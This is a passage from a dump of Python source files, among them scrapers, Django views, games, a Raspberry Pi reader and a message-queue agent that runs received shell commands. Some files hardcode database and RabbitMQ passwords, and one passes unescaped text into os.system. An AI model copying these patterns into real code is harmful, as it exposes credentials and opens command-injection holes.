\"1_{tile:05d}_Z{zplane:03d}_CH{channel:d}.tif\"\n\n tile_arrangement = create_arrangement_skeleton_by_channel_tile_zplane(listing)\n\n arranged_listing = dict()\n for channel in tile_arrangement:\n for tile in tile_arrangement[channel]:\n for zplane in tile_arrangement[channel][tile]:\n file_name = pattern.format(tile=tile, zplane=zplane, channel=channel)\n file_path = px.join(img_dir, file_name)\n arranged_listing = add_to_dict(arranged_listing, channel, {})\n arranged_listing[channel] = add_to_dict(arranged_listing[channel], tile, {zplane: file_path})\n\n return arranged_listing\n\n\ndef get_image_paths_arranged_in_dict(img_dir: str):\n img_listing = get_img_listing(img_dir)\n arranged_listing = arrange_listing(img_dir, img_listing)\n\n return arranged_listing\n","sub_path":"image_paths_arrangement.py","file_name":"image_paths_arrangement.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17906365","text":"from selenium import webdriver\nimport time\n\n\ndef search(question, user_num):\n driver = webdriver.Chrome()\n url_search = 'https://zhidao.baidu.com/'\n driver.get(url_search)\n driver.find_element_by_xpath('//*[@id=\"kw\"]').send_keys(question)\n driver.find_element_by_xpath('//*[@id=\"search-btn\"]').click()\n time.sleep(3)\n if driver.find_elements_by_class_name('answer'):\n answer = driver.find_elements_by_class_name('answer')[user_num].text.strip('答:')\n driver.close()\n return answer\n else:\n driver.close()\n return False","sub_path":"search_question.py","file_name":"search_question.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125538163","text":"from decimal import Decimal\nfrom typing import List, Union\n\nfrom ...asset import Asset\nfrom ...call_builder.base import BaseStrictSendPathsCallBuilder\nfrom ...call_builder.call_builder_sync.base_call_builder import BaseCallBuilder\nfrom 
...client.base_sync_client import BaseSyncClient\nfrom ...type_checked import type_checked\n\n__all__ = [\"StrictSendPathsCallBuilder\"]\n\n\n@type_checked\nclass StrictSendPathsCallBuilder(BaseCallBuilder, BaseStrictSendPathsCallBuilder):\n \"\"\"Creates a new :class:`StrictSendPathsCallBuilder` pointed to server defined by horizon_url.\n Do not create this object directly, use :func:`stellar_sdk.Server.strict_send_paths`.\n\n The Stellar Network allows payments to be made across assets through path\n payments. A strict send path payment specifies a series of assets to route a\n payment through, from source asset (the asset debited from the payer) to\n destination asset (the asset credited to the payee).\n\n A strict send path search is specified using:\n\n - The source asset\n - The source amount\n - The destination assets or destination account.\n\n As part of the search, horizon will load a list of assets available to the\n source address and will find any payment paths from those source assets to\n the desired destination asset. The search's source_amount parameter will be\n used to determine if there a given path can satisfy a payment of the desired\n amount.\n\n See `List Strict Send Payment Paths `__ for more information.\n\n :param horizon_url: Horizon server URL.\n :param client: The client instance used to send request.\n :param source_asset: The asset to be sent.\n :param source_amount: The amount, denominated in the source asset, that any returned path should be able to satisfy.\n :param destination: The destination account or the destination assets.\n \"\"\"\n\n def __init__(\n self,\n horizon_url: str,\n client: BaseSyncClient,\n source_asset: Asset,\n source_amount: Union[str, Decimal],\n destination: Union[str, List[Asset]],\n ) -> None:\n super().__init__( # type: ignore[call-arg]\n horizon_url=horizon_url,\n client=client,\n source_asset=source_asset,\n source_amount=source_amount,\n destination=destination,\n )\n","sub_path":"stellar_sdk/call_builder/call_builder_sync/strict_send_paths_call_builder.py","file_name":"strict_send_paths_call_builder.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305183996","text":"import argparse\nimport time, os, subprocess\nimport RPi.GPIO as GPIO\nimport wave, sys, pyaudio \n\n\n# Controls how to configure raspberry pins: Add more modes?\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--scan\", default=True,\n help = \"Execute image reader\")\nap.add_argument(\"-r\", \"--reader\", default=False,\n help = \"Execute image reader\")\nap.add_argument('-a', '--ausgabe', help = 'How to convert text to speech')\nargs = vars(ap.parse_args())\n\n\n# Audio\ndef create_play(text, speed=0.93, language='de-DE'):\n '''transforms given text into a temporary wav file and plays it. 
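Relies on pico2wave for synthesis and pyaudio for playback, so both must be installed.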
\n text: words to be spoken\n speed: changes rate of sound [0-1]\n language: choose language see aplay -h'''\n\n os.system('''pico2wave -l {} -w /home/pi/hackdemyk/audio/temp.wav \"{}\"'''.format(language,text))\n sound = wave.open(\"/home/pi/hackdemyk/audio/temp.wav\")\n p = pyaudio.PyAudio()\n chunk = 1024\n stream = p.open(format =\n p.get_format_from_width(sound.getsampwidth()),\n channels = sound.getnchannels(),\n rate = int(sound.getframerate()*speed),\n output = True)\n data = sound.readframes(chunk)\n while True:\n if data != '':\n stream.write(data)\n data = sound.readframes(chunk)\n if data == b'':\n break\n\n# Initializing raspberrypi 3b + pins.\n#create_play(text='Das System is bereit. Drucken Sie auf den linken Knopf um Bilder aufzunehmen. Wenn sie fertig sind, drucken sie auf den rechten Knopf um die Textverarbeitung zu starten')\ncreate_play(text='Das System is bereit')\nif bool(args['scan']) == True:\n # RPi.GPIO Layout verwenden (wie Pin-Nummern)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_UP) # When Button pressed, voltage received, taking a photo\n GPIO.setup(11, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n read = True\n count = 0\n while True:\n if GPIO.input(13) == False:\n create_play(text='Bild wird aufgenommen')\n os.system('python3 camera.py -n DEBUG{}'.format(count))\n count+=1\n time.sleep(2)\n print(\"Press Button@13 to take a picture\")\n create_play(speed=0.93, text='Drucken Sie erneut den gleichen Knopf um ein neues Bild aufzunehmen. Oder drucken Sie den rechten Knopf um Verarbeitung zu starten')\n print(\"Or Press Button@Pin11 to Extract Text\")\n if GPIO.input(11) == False:\n print('Initiating Text Extraction')\n mode='online'\n create_play(text='Verarbeitung gestartet')\n os.system(\"python3 images_to_text.py -f scanned_images -m {} -o results\".format(mode))\n break\nprint('Completed')\n\n\nextracted_text = open(\"/home/pi/hackdemyk/text_results/results.txt\",\"r\") \nto_read=extracted_text.read()\nextracted_text.close()\n\ncreate_play(text = to_read, language='de-DE')\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507133419","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .forms import EmployeerForm\nfrom .models import Employeer\nfrom django.contrib.auth.decorators import login_required\n\n\n\n# Create your views here.\ndef employeer(request):\n if request.method == 'POST':\n data = request.POST\n first_name = data['first_name']\n last_name = data['last_name']\n email = data['email']\n mobile = data['mobile']\n address = data['address']\n # save objects to Employeer model in database\n obj = Employeer.objects.create(first_name= first_name,last_name=last_name,email=email,\n mobile= mobile,address = address)\n\n # If objects is created then redirect to home page\n if obj:\n return redirect('employeer-home')\n\n else:\n Employeers = Employeer.objects.all()\n form = EmployeerForm()\n context = {\n 'form':form,\n 'employeers':Employeers,\n }\n return render(request,'employeer/employeer.html',context)\n\n # if request.method = request.POST:\n # data = request.POST\n # print(data)\n # # Two ways of accessing dictionary key value pairs\n # print(data['email'])\n # print(data.get('email'))\n # return render(request,'employeer/employeer.html')\n # else:\n # return render(request,'employeer/employeer.html')\n\n@login_required\ndef 
employeer_add(request):\n form = EmployeerForm()\n if request.method == 'POST':\n employeer_data = EmployeerForm(request.POST)\n if employeer_data.is_valid():\n employeer_data.save()\n return redirect('employeer-home')\n context = {\n 'form':form,\n 'action':'Add New employeer'\n }\n return render(request,'employeer/employeer_add.html',context)\n\n\n@login_required\ndef employeer_update(request,id):\n instance = Employeer.objects.get(id=id)\n form = EmployeerForm(instance=instance)\n if request.method == 'POST':\n form_data = EmployeerForm(request.POST,instance = instance)\n if form_data.is_valid():\n form_data.save()\n return redirect('employeer-home')\n context = {\n 'form':form,\n 'action':'Update Employeer Details'\n }\n # Using template similar to add for update employeer\n return render(request,'employeer/employeer_add.html',context)\n\n@login_required\ndef employeer_delete(request,id):\n employeer_instance = Employeer.objects.get(id=id)\n if request.method == 'POST':\n employeer_instance.delete()\n return redirect('employeer-home')\n context ={\n 'employeer': employeer_instance,\n }\n return render(request,'employeer/employeer_delete.html',context)\n","sub_path":"10. User authentication in CRUD application/employeer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20509819","text":"# Battleships game playground\n\n\nclass Singleton(type):\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass Playground(metaclass=Singleton):\n\n @staticmethod\n def show(player1, player2, p1_show=True, p2_show=True):\n print(' A B C D E F G H I J A B C D E F G H I J')\n print(' ┌─────────────────────┐ ┌─────────────────────┐')\n for row in range(0, 10):\n print('{:2} │'.format(row + 1), end=' ')\n if p1_show:\n Playground.print_cells(row, player1.ships, player2.hits)\n else:\n print(' ', end='')\n print('│ {:2} │ '.format(row + 1), end='')\n if p2_show:\n Playground.print_cells(row, player2.ships, player1.hits)\n else:\n print(' ', end='')\n print('│ {:2}'.format(row + 1))\n print(' └─────────────────────┘ └─────────────────────┘')\n print(' A B C D E F G H I J A B C D E F G H I J')\n\n @staticmethod\n def print_cells(row, ships, hits):\n all_ships = []\n all_hits = []\n for ship in ships:\n all_ships.extend(ship.coordinates)\n for hit in hits:\n all_hits.append(hit.coordinate)\n for col in range(10):\n if ((row, col) in all_ships) and ((row, col) in all_hits):\n print('X', end=' ')\n elif (row, col) in all_ships:\n print('#', end=' ')\n elif (row, col) in all_hits:\n print('*', end=' ')\n else:\n print('•', end=' ')\n","sub_path":"lecture_07/battleships/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595801858","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/harold/publishers/cheetahtemplate.py\n# Compiled at: 2006-08-02 05:57:50\nfrom Cheetah.Template import Template as CT\nfrom harold.publishers.common import TemplateMixin, request_args\n\nclass CheetahTemplate(TemplateMixin):\n \"\"\" Instances read Cheetah 
templates and render them.\n\n \"\"\"\n __module__ = __name__\n ext = '.tmpl'\n index = 'index.tmpl'\n\n class ref:\n __module__ = __name__\n src = 'non-empty string to supress warnings'\n module = CT(src)\n disallow = set(dir(module))\n\n def render(self, filename, args):\n \"\"\" After a template is located, the mixin calls this method\n to complete the rendering process.\n\n @param filename name of template module to import\n @param args sequence of additional items from the request\n @return rendered template\n \"\"\"\n try:\n method_name = args.pop(0)\n except (IndexError,):\n method_name = ''\n\n def simple():\n context = self.context()()\n search = [dict(args=args, form=self.form(), context=context), context]\n template = CT(file=filename, searchList=search)\n return str(template)\n\n if not method_name:\n return simple()\n context = self.context()\n search = [dict(args=args, form=self.form(), context=context()), context()]\n template = CT(file=filename, searchList=search)\n view_names = set(dir(template)) - self.ref.disallow\n if method_name not in view_names:\n args.insert(0, method_name)\n return simple()\n call = getattr(template, method_name)\n (cargs, ckwds) = request_args(call, args, self.form(), context)\n return call(*cargs, **ckwds)","sub_path":"pycfiles/cleverlab-0.0.3-py3-none-any/cheetahtemplate.py","file_name":"cheetahtemplate.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296494871","text":"\"\"\"\npipeline designed to create/update active roster table within the NBA states database\n\"\"\"\n\nimport pymysql\nimport re\nimport requests\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom sqlalchemy import create_engine\n\ndef truncate_table(connection):\n truncate_table_statement = 'truncate table active_rosters'\n sql_execute(truncate_table_statement, connection)\n\ndef get_roster_links():\n roster_links = []\n link = 'http://www.espn.com/nba/teams'\n soup = BeautifulSoup(requests.get(link).content, 'html.parser')\n\n for i in soup.find_all('a', href=True):\n if '/nba/team/roster/' in i['href']:\n roster_links.append('http://www.espn.com{}'.format(i['href']))\n return roster_links\n\ndef get_rosters(link, chromeDriver):\n browser = webdriver.Chrome(executable_path=chromeDriver)\n browser.get(link)\n team = browser.find_element_by_xpath('//*[@id=\"fittPageContainer\"]/div[3]/div[2]/div[1]/div/section/section/div[1]/h1').text.split()[:-1]\n body = browser.find_element_by_xpath('//*[@id=\"fittPageContainer\"]/div[3]/div[2]/div[1]/div/section/section/div[4]/section/table')\n\n roster_list = []\n for i in body.text.split('\\n')[1:]:\n name = []\n for p in i.split():\n if p not in ['PG', 'SG', 'SF', 'PF', 'C', 'G', 'F']:\n name.append(p)\n else:\n break\n roster_list.append([' '.join([i for i in name[1:]]), ' '.join([i for i in team])])\n browser.quit()\n return np.array(roster_list)\n\ndef extract_command(file_path):\n with open(file_path, 'r') as infile:\n return [i for i in infile.readlines()]\n\ndef gen_cmd_str(file_content):\n return ' '.join([i for i in file_content])\n\ndef gen_df(conn, sql):\n return pd.read_sql(sql=sql, con=conn)\n\ndef get_player_id(player_name, sql, conn):\n try:\n return sql_execute(sql.format(check_name(player_name)), conn)[0][0]\n except IndexError:\n return 0\n\ndef check_name(name):\n if '\\'' in name:\n name = name[:name.index('\\'')] + '\\\\' + 
name[name.index('\\''):]\n return name\n\ndef sql_execute(query, connection):\n exe = connection.cursor()\n exe.execute(query)\n return exe.fetchall()\n\ndef insert_into_database(conn, df):\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\".format(user=\"root\", pw=\"Sk1ttles\", db=\"nba_stats_backup\"))\n df.to_sql(con=engine, name='active_rosters', if_exists='replace', index=False)\n\nif __name__ == '__main__':\n myConnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"Sk1ttles\", db=\"nba_stats_backup\", autocommit=\"true\")\n chromeDriver = '/Users/Philip/Downloads/chromedriver'\n\n truncate_table(myConnection)\n active_rosters = np.empty(shape=[0,2])\n for roster in get_roster_links()[:2]:\n active_rosters = np.concatenate([active_rosters, get_rosters(roster, chromeDriver)])\n\n rosters_df = pd.DataFrame(active_rosters, index=None, columns=['name', 'team'])\n rosters_df['player_id'] = rosters_df.loc[:, 'name'].astype(str).apply(lambda x: get_player_id(x, gen_cmd_str(extract_command(sys.argv[1])), myConnection))\n team_info_df = gen_df(myConnection, gen_cmd_str(extract_command(sys.argv[2])))\n\n active_rosters_df = pd.merge(rosters_df[rosters_df['player_id'] != 0], team_info_df, how='inner', left_on='team', right_on='team')\n insert_into_database(myConnection, active_rosters_df)\n","sub_path":"Pipeline Development/active_rosterV2.py","file_name":"active_rosterV2.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504840089","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'fuzc'\n\nfrom conf import configs\nfrom modules import files\nimport pika\nimport platform #为获取操作系统类型\nimport subprocess\nimport json, threading\n\nclass CommandManagement(object):\n '''\n 客户端输入命令解析\n '''\n def __init__(self, argvs):\n self.argvs = argvs[1:]\n self.argv_handler()\n\n def argv_handler(self):\n if len(self.argvs) == 0:\n exit(\"\\033[31;1mError:Need argumemt: start\\stop\\033[0m\")\n if hasattr(self,self.argvs[0]):\n func = getattr(self,self.argvs[0]) #获取start or stop方法\n func() #执行start or stop方法\n else:\n exit(\"Invalid argument\")\n\n def start(self):\n '''\n 客户端命令执行开始函数\n :return:\n '''\n client_obj = SaltClient() #创建类的对象\n client_obj.listen()\n\n def stop(self):\n pass\n\nclass TaskHandle(object):\n def __init__(self, main_obj, task_body):\n self.main_obj = main_obj\n self.task_body = json.loads(task_body.decode())\n\n def processing(self):\n '''\n process task\n :return:\n '''\n check_res = self.check_data_validation() #检查数据的有效性\n if check_res:\n self.current_os_type, data = check_res\n self.parse_task_data(self.current_os_type, data)\n\n def task_callback(self,callback_queue,callback_data):\n '''\n 把执行结果返回给服务器\n :param callback_queue:\n :param callback_data:\n :return:\n '''\n data = {\n 'client_id':self.main_obj.client_id,\n 'data': callback_data\n }\n\n #声明queue\n self.main_obj.mq_channel.queue_declare(queue=callback_queue)\n self.main_obj.mq_channel.basic_publish(exchange='',\n routing_key=callback_queue,\n body=json.dumps(data))\n print(\" [x] Sent task callback to [%s] \" % callback_queue)\n\n def parse_task_data(self,os_type,data):\n '''\n 解析任务数据并执行;\n 涉及到data中配置中不同子任务section之间的依赖,采取的方法是如果已经执行的section放入applied_list列表中,如果依赖关系没有形成死循环,则每次循环至少有一个section被执行,所以比较上一次和这次执行后appliend_list的长度,如果相等则代表section之间依赖关系形成死锁或者section均被执行完毕\n :param os_type:\n :param data:\n :return:\n '''\n applied_list = [] #所有已经执行的子任务(section)都放在此列表里\n applied_result = 
[] #把所有子任务section的执行结果放在此列表\n last_loop_section_set_len = len(applied_list)\n while True:\n for section_data in data:\n if section_data.get('called_flag'): #代表data中已经执行的section\n print(\"\\033[34;1mcalled already\\033[0m\".center(60,'-'))\n else:\n apply_status, result = self.apply_section(section_data)\n if apply_status == True:#代表执行成功\n applied_list.append(section_data)\n applied_result += result\n\n if last_loop_section_set_len == len(applied_list):\n #此两变量相等,代表2种可能,要么都执行完了,要么section之间的依赖关系形成了反锁,退出循环\n print('\\033[34;1mparse task done\\033[0m'.center(60, '*'), len(applied_list), last_loop_section_set_len)\n print('\\033[35;1mapplied_list\\033[0m',applied_list)\n print('\\033[35;1mapplied_result\\033[0m',applied_result)\n break\n last_loop_section_set_len = len(applied_list)\n #下面则把执行结果返回给服务器\n print(\"\\033[42;1msend task result to callback queue:\\033[0m\",self.task_body['callback_queue'])\n self.task_callback(self.task_body['callback_queue'],applied_result)\n\n def check_pre_requirites(self, conditions):\n '''\n 检查依赖条件是否满足\n :param conditions:\n :return:\n '''\n print('\\033[35;1mcheck pre requisites\\033[0m'.center(60,'-'))\n conditions_result = []\n for condition in conditions:\n #print(condition)\n cmd_res = subprocess.run(condition,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n conditions_result.append(int(cmd_res.stdout.decode().strip()))\n\n print(\"\\033[41;1mcmd_res:\\033[0m\",conditions_result)\n return sum(conditions_result)\n\n def run_cmds(self, cmd_list):\n '''\n 运行命令,返回结果\n :param cmd_list:\n :return:\n '''\n cmd_results = []\n for cmd in cmd_list:\n # print (cmd)\n cmd_res = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n cmd_results.append([cmd_res.returncode, cmd_res.stderr.decode()])\n\n print('\\033[41;1mcmd res:\\033[0m',cmd_results)\n return cmd_results #若所有命令执行成功,则返回为0\n\n def apply_section(self, section_data):\n '''\n 执行指定的section\n :param section_data:\n :return:\n '''\n print(\"\\033[32;1mapplying section data\\033[0m\".center(50,'-'))\n if section_data['require_list'] != None:\n #检查依赖require条件是否满足\n if self.check_pre_requirites(section_data['require_list']) == 0: #依赖条件满足,此处需要依赖条件中的命令在os中执行返回0为满足,返回1为不满足\n if section_data.get('file_module') == True: #文档文件单独处理\n res = self.file_handle(section_data)\n else:\n res = self.run_cmds(section_data['cmd_list'])\n section_data['called_flag'] = True\n return [True, res]\n else:\n print(\"\\033[33;1m依赖不满足\\033[0m\")\n return [False, None]\n else:#没依赖关系直接执行\n if section_data.get('file_module') == True: # 文档文件单独处理\n res = self.file_handle(section_data)\n else:\n res = self.run_cmds(section_data['cmd_list'])\n section_data['called_flag'] = True\n return [True, res]\n\n def file_handle(self, section_data):\n '''\n 对文件进行操作\n :param section_data:\n :return:\n '''\n file_module_obj = files.FileModule(self)\n file_module_obj.process(section_data)\n return []\n\n def check_data_validation(self):\n '''\n 检查数据的有效性,确保服务器发来的任务是在本客户端可以执行\n :return:\n '''\n #print('-----parse task-----')\n os_version = platform.version().lower() #获取客户端系统的版本信息\n\n for os_type,data in self.task_body['data'].items():\n #print(os_version, os_type)\n if os_type in os_version:\n return os_type, data\n else:\n print(\"\\033[31;1msalt is not supported on this os \\033[0m\", os_version)\n\nclass SaltClient(object):\n def __init__(self):\n self.configs = configs\n self.make_connection()\n self.client_id = self.get_needle_id()\n self.task_queue_name = \"TASK_Q_%s\" % self.client_id #client queue\n\n def 
make_connection(self):\n '''\n mq建立连接方法;需设置客户端用户名和密码访问权限,且需在MQ中增加此用户名和密码,并设置权限\n :return:\n '''\n credentials = pika.PlainCredentials('fuzc','fuzc1234') #mq访问权限设置\n self.mq_conn = pika.BlockingConnection(pika.ConnectionParameters(configs.MQ_CONN['host'],\n configs.MQ_CONN['port'],'/',credentials))\n self.mq_channel = self.mq_conn.channel()\n\n def get_needle_id(self):\n '''\n 应去服务器中取自己客户端的id\n 此处暂时偷懒做法--取configs自定义的一个id\n :return:\n '''\n return configs.SALT_CLIENT_ID\n\n def listen(self):\n '''\n 开始监听服务器的call\n :return:\n '''\n self.msg_consume()\n\n def start_thread(self, task_body):\n print('\\033[35;1m start a thread to process task\\033[0m')\n task = TaskHandle(self, task_body)\n task.processing()\n\n def msg_callback(self, ch, method, properties, body):\n print(\" \\033[34;1m[x] Received a task msg.\\033[0m \")\n thread = threading.Thread(target=self.start_thread, args=(body,)) #启动一个进程处理MQ中的命令\n thread.start()\n\n def msg_consume(self):\n '''\n 客户端监听\n :return:\n '''\n self.mq_channel.queue_declare(queue=self.task_queue_name)\n\n self.mq_channel.basic_consume(self.msg_callback,\n queue=self.task_queue_name,\n no_ack=True)\n\n print(\" [%s] Waiting for messages. To exit press CTRL+C\" % self.task_queue_name)\n\n self.mq_channel.start_consuming()\n","sub_path":"saltstack/saltclient/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444033304","text":"\"\"\" Utiltity functions for models\"\"\"\nimport os\n\nfrom ulmo.ood import ood\n\nsst_path = '/Volumes/Aqua-1/MODIS/uri-ai-sst/OOD' if os.getenv('SST_OOD') is None else os.getenv('SST_OOD')\n\nmodel_path = os.path.join(sst_path, 'Models')\n\ndef load(mtype):\n # Load up the model\n if mtype == 'standard':\n datadir = os.path.join(model_path, 'R2019_2010_128x128_std')\n filepath = 'PreProc/MODIS_R2019_2010_95clear_128x128_preproc_std.h5'\n pae = ood.ProbabilisticAutoencoder.from_json(datadir + '/model.json',\n datadir=datadir,\n filepath=filepath,\n logdir=datadir)\n else:\n raise IOError(\"Not ready for mtype={}\".format(mtype))\n pae.load_autoencoder()\n pae.load_flow()\n\n # Return\n return pae\n","sub_path":"ulmo/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342297840","text":"#!/usr/bin/env python3\n\ncoins = [100,25,10,5,1]\n\ndef change(target):\n if target == 0:\n return []\n useful_coins = list(reversed(sorted([coin for coin in coins if coin <= target])))\n print(useful_coins)\n total = 0\n i = 0\n used_coins = []\n while total != target and i < len(useful_coins):\n prospective = total + useful_coins[i]\n if prospective <= target:\n used_coins.append(useful_coins[i])\n total = prospective\n else:\n i = i + 1\n if total == target:\n return used_coins\n else:\n return None\n\nprint(change(15))\n","sub_path":"python/coin_change2.py","file_name":"coin_change2.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372299047","text":"import math\nimport copy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n if (any(EMPTY in row for 
row in board)):\n numX = sum(row.count(X) for row in board)\n numO = sum(row.count(O) for row in board)\n\n if (numO == numX):\n return X\n else:\n return O\n else:\n return \n #raise NotImplementedError\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n poss = set()\n flag = 0\n for i in range(3):\n for j in range(3):\n if (board[i][j] == EMPTY):\n flag = 1\n #s = str(i)+str(j)\n poss.add((i,j))\n\n if (flag==0):\n return -1\n else:\n return poss\n #raise NotImplementedError\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n newBoard = copy.deepcopy(board)\n i, j = action\n if (newBoard[i][j] != EMPTY):\n raise Exception(\"Not possible\")\n else:\n turn = player(newBoard)\n newBoard[i][j] = turn\n return newBoard\n #raise NotImplementedError\n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n # if matches all rows\n for i in range(3):\n if (board[i].count(X) == 3):\n return X\n elif (board[i].count(O) == 3):\n return O\n \n # for all columns\n for i in range(3):\n if (board[0][i] == board[1][i] == board[2][i] == X):\n return X\n elif (board[0][i] == board[1][i] == board[2][i] == O):\n return O\n\n # for main diagonal \n flagX = 0\n flagO = 0\n for i in range(3):\n if (board[i][i] == X):\n flagX += 1\n elif (board[i][i] == O):\n flagO += 1\n if (flagX == 3):\n return X\n elif (flagO == 3):\n return O\n \n #for anti diagonal\n flagO = 0\n flagX = 0\n for i in range(3):\n if (board[i][3-i-1] == X):\n flagX += 1\n elif (board[i][3-i-1] == O):\n flagO += 1\n if (flagX == 3):\n return X\n elif (flagO == 3):\n return O\n \n return None\n #raise NotImplementedError\n\n\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n if (winner(board)!=None):\n return True\n \n fill = 0\n for i in range(3):\n for j in range(3):\n if (board[i][j] != EMPTY):\n fill += 1\n\n if (fill == 9):\n return True\n else:\n return False\n\n # raise NotImplementedError\n\n\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n w = winner(board)\n if (w == X):\n return 1\n elif (w == O):\n return -1\n else:\n return 0\n\n # raise NotImplementedError\n\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n if (terminal(board) == True):\n return None\n elif (player(board) == X):\n best = -2\n bestMove = tuple()\n moves = actions(board)\n for move in moves:\n move_val = MIN(result(board,move))\n if (move_val == 1):\n return move\n elif (move_val > best):\n best = move_val\n bestMove = move\n return bestMove\n elif (player(board) == O):\n best = 2\n bestMove = tuple()\n moves = actions(board)\n for move in moves:\n move_val = MAX(result(board,move))\n if (move_val == -1):\n return move\n elif (move_val < best):\n best = move_val\n bestMove = move\n return bestMove\n # raise NotImplementedError\n\ndef MAX(board):\n if (terminal(board) == True):\n return utility(board)\n \n m = -2\n moves = actions(board)\n for move in moves:\n m = max(m, MIN(result(board,move)))\n if (m == 1):\n return m\n return m\n\n\ndef MIN(board):\n if (terminal(board) == True):\n return utility(board)\n \n m = 2\n moves = actions(board)\n for move in moves:\n m = min(m, MAX(result(board,move)))\n if (m==-1):\n return m\n return 
m","sub_path":"src/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352444618","text":"\"\"\"\nCheck equilibration time of model using the vertically averaged overturning circulation strength. 2/05/2018\n1) Check if model is spun up by looking at first 5 years of data\n2) Check model response time to a sudden shift in insolation using second 5 years\n\n\"\"\"\n\nimport xarray as xr\nimport sh\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nfrom hadley_cell import mass_streamfunction\nfrom data_handling_updates import cell_area, gradients as gr\nimport sys\nimport statsmodels.api as sm\nfrom climatology import precip_centroid\n\ndef sf_spinup(run, months_list, filenames=['plev_pentad']):\n \n # Function to open files for a specfied month range and filename.\n def open_files(run, months, filename):\n name_temp = '/disca/share/rg419/Data_moist/' + run + '/run%04d/'+filename+'.nc'\n names = [name_temp % m for m in range( months[0], months[1]) ]\n data = xr.open_mfdataset( names, decode_times=False, chunks={'time': 30})\n # Reduce dataset so that only vcomp is retained\n data = xr.Dataset({'vcomp': data.vcomp, 'precipitation':data.precipitation}, coords=data.vcomp.coords) \n #data.coords['month'] = data.time//30 + 1 \n #data = data.groupby('month').mean(('time'))\n return data\n \n arrays = []\n i=0\n for filename in filenames:\n data = open_files(run, months_list[i], filename)\n arrays.append(data)\n i=i+1 \n data = xr.concat(arrays, dim='time')\n \n precip_centroid(data)\n adj_time = np.min(data.p_cent.time.where(data.p_cent >= 15.,drop=True).values) \n \n return data.p_cent, adj_time\n\n\n# Set plotting directory\nplot_dir = '/scratch/rg419/plots/paper_2_figs/'\nmkdir = sh.mkdir.bake('-p')\nmkdir(plot_dir)\n\n\n#sf_spinup('ss_eq_20', [[1,61]], filenames=['plev_monthly'])\n#psi_sst, adj_time = sf_spinup('ss_eq_sst', [[1,61],[61,121]], filenames=['plev_monthly','plev_pentad'])\npcent_sst, adj_time_sst = sf_spinup('ss_eq_sst', [[61,121]], filenames=['plev_pentad'])\nprint('sst')\npcent_sst_zs, adj_time_sst_zs = sf_spinup('ss_eq_sst_zs', [[61,121]], filenames=['plev_pentad'])\nprint('sst_zs')\npcent_2p5, adj_time_2p5 = sf_spinup('ss_eq_2.5', [[61,121]], filenames=['plev_pentad'])\nprint('2.5')\npcent_5, adj_time_5 = sf_spinup('ss_eq_5', 